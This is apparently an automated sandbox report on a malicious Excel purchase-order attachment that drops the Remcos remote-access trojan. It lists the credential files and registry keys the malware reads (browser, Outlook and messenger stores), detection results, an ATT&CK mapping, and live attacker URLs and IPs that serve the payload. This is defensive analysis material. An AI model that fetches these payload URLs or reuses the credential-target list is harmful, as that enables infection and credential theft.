Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2148, type: MEMORYSTR

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8
Source: taskhostw[1].exe.9.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\svchost.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R

Yara detected Remcos RAT

Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_00226399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	10_2_00226399
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0022685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	10_2_0022685D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012D6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	11_2_012D6399
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012D685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	11_2_012D685D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	2 Valid Accounts	1 Native API	121 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	15 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	21 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	2 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	1 Credentials In Files	128 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	1 Masquerading	LSA Secrets	13 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	124 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO-00006799868.xls	13%	ReversingLabs	Document-PDF.Trojan.Heuristic
PO-00006799868.xls	14%	Virustotal		Browse
PO-00006799868.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\directory\name.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\taskhostw.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
shuvi.io	0%	Virustotal		Browse
geoplugin.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.imvu.comr	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
http://www.imvu.com	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://www.ebuddy.com	0%	URL Reputation	safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_	0%	Virustotal		Browse
https://shuvi.io/	0%	Virustotal		Browse
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9	0%	Virustotal		Browse
https://support.google.com/chrome/?p=plugin_flash	0%	Virustotal		Browse
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png	0%	Virustotal		Browse
http://b.scorecardresearch.com/beacon.js	0%	Virustotal		Browse
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html	0%	Virustotal		Browse
http://cache.btrll.com/default/Pix-1x1.gif	0%	Virustotal		Browse
http://acdn.adnxs.com/ast/ast.js	0%	Virustotal		Browse
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683	0%	Virustotal		Browse
http://o.aolcdn.com/ads/adswrappermsni.js	0%	Virustotal		Browse
http://cdn.taboola.com/libtrc/msn-home-network/loader.js	0%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	0%	Virustotal		Browse
http://www.msn.com/de-de/?ocid=iehp	0%	Virustotal		Browse
http://static.chartbeat.com/js/chartbeat.js	0%	Virustotal		Browse
http://www.msn.com/?ocid=iehp	0%	Virustotal		Browse
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033	0%	Virustotal		Browse
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js	0%	Virustotal		Browse
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%	0%	Virustotal		Browse
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3	0%	Virustotal		Browse
http://geoplugin.net/json.gpR	0%	Virustotal		Browse
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js	0%	Virustotal		Browse
https://shuvi.io/7al0eY	0%	Virustotal		Browse
https://www.ccleaner.com/go/app_cc_pro_trialkey	0%	Virustotal		Browse
http://www.nirsoft.net/	0%	Virustotal		Browse
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh	0%	Virustotal		Browse
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9	0%	Virustotal		Browse
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683	0%	Virustotal		Browse
https://support.google.com/chrome/?p=plugin_fl	0%	Virustotal		Browse
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
shuvi.io	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
geoplugin.net	178.237.33.50	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://104.168.7.25/450/taskhostw.exe	true		unknown
https://shuvi.io/7al0eY	false	0%, Virustotal, Browse	unknown
http://geoplugin.net/json.gp	true	URL Reputation: safe	unknown
http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc	true		unknown
107.173.4.16	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://b.scorecardresearch.com/beacon.js	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://104.168.7.25/450/taskhostw.exennC:	EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://acdn.adnxs.com/ast/ast.js	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://www.imvu.comr	svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://shuvi.io/	shuvi.io.url.4.dr	false	0%, Virustotal, Browse	unknown
https://support.google.com/chrome/?p=plugin_flash	svchost.exe, 0000000D.00000003.467652223.0000000000525000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://deff.nelreports.net/api/report?cat=msn	bhv35FF.tmp.13.dr	false	URL Reputation: safe	unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://www.nirsoft.netXB	svchost.exe, 0000000D.00000002.467921215.0000000000184000.00000004.00000010.00020000.00000000.sdmp	false		unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		unknown
http://cache.btrll.com/default/Pix-1x1.gif	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://www.google.com	svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://geoplugin.net/json.gp/C	name.exe, 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://o.aolcdn.com/ads/adswrappermsni.js	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://www.msn.com/?ocid=iehp	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://104.168.7.25/450/taskhostw.exegu4	EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://static.chartbeat.com/js/chartbeat.js	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://www.msn.com/de-de/?ocid=iehp	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://shuvi.io/7al0eYyX	68730000.0.dr, ~DFF2F9DC4D2772FBCE.TMP.0.dr	false		unknown
http://geoplugin.net/json.gpR	svchost.exe, 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://www.nirsoft.net/	svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://104.168.7.25/450/taskhostw.exedv	EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey	bhv35FF.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://support.google.com/chrome/?p=plugin_fl	svchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://contextual.media.net/8/nrrV73987.js	bhv35FF.tmp.13.dr	false		unknown
http://www.imvu.com	svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.464109574.0000000001D79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/	bhv35FF.tmp.13.dr	false		unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js	bhv35FF.tmp.13.dr	false		unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	bhv35FF.tmp.13.dr	false		unknown
http://geoplugin.net/json.gp~	svchost.exe, 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.msn.com/	bhv35FF.tmp.13.dr	false		unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	bhv35FF.tmp.13.dr	false		unknown
http://www.imvu.com/S	svchost.exe, 0000000F.00000002.463895380.00000000001DC000.00000004.00000010.00020000.00000000.sdmp	false		unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549	bhv35FF.tmp.13.dr	false		unknown
http://104.168.7.25/450/taskhostw.exej	EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://cdn.at.atwola.com/_media/uac/msn.html	bhv35FF.tmp.13.dr	false		unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset	bhv35FF.tmp.13.dr	false		unknown
https://support.google.com/chrome/	svchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://policies.yahoo.com/w3c/p3p.xml	bhv35FF.tmp.13.dr	false		unknown
http://www.msn.com/advertisement.ad.js	bhv35FF.tmp.13.dr	false		unknown
http://www.ebuddy.com	svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	shuvi.io	European Union	13335	CLOUDFLARENETUS	true
104.168.7.25	unknown	United States	36352	AS-COLOCROSSINGUS	true
107.173.4.16	unknown	United States	36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532154
Start date and time:	2024-10-12 16:38:18 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO-00006799868.xls
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winXLS@20/40@9/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 68 Number of non-executed functions: 220
Cookbook Comments:	Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer Override analysis time to 55090.7280723813 for current running targets taking high CPU consumption Override analysis time to 110181.456144763 for current running targets taking high CPU consumption Override analysis time to 220362.912289525 for current running targets taking high CPU consumption

Warnings

